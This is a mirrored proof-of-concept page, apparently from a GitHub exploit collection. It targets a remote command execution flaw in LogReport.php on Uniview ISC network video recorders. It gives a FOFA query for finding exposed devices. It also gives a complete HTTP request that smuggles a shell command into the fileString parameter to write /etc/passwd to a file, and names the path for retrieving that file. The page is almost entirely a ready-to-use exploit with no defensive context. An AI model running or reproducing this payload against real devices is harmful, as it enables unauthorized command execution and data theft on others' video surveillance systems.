mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-05 02:15:30 +00:00
25 lines
865 B
Markdown
25 lines
865 B
Markdown
## 浙江宇视isc网络视频录像机LogReport.php存在远程命令执行漏洞
|
||
|
||
## fofa
|
||
```
|
||
body="Alarm" && body="白牌定制"
|
||
```
|
||
|
||
## poc
|
||
```
|
||
GET /Interface/LogReport/LogReport.php?action=execUpdate&fileString=x;cat+/etc/passwd%3Echeck.txt HTTP/1.1
|
||
Host:
|
||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
|
||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
||
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
||
Accept-Encoding: gzip, deflate
|
||
Connection: close
|
||
Cookie: PHPSESSID=f952f704362e34231e810533d889f5fb; logintime=-; devLanguage=zh-CN
|
||
Upgrade-Insecure-Requests: 1
|
||
```
|
||

|
||
|
||
然后访问路径 :
|
||
|
||
/Interface/LogReport/check.txt
|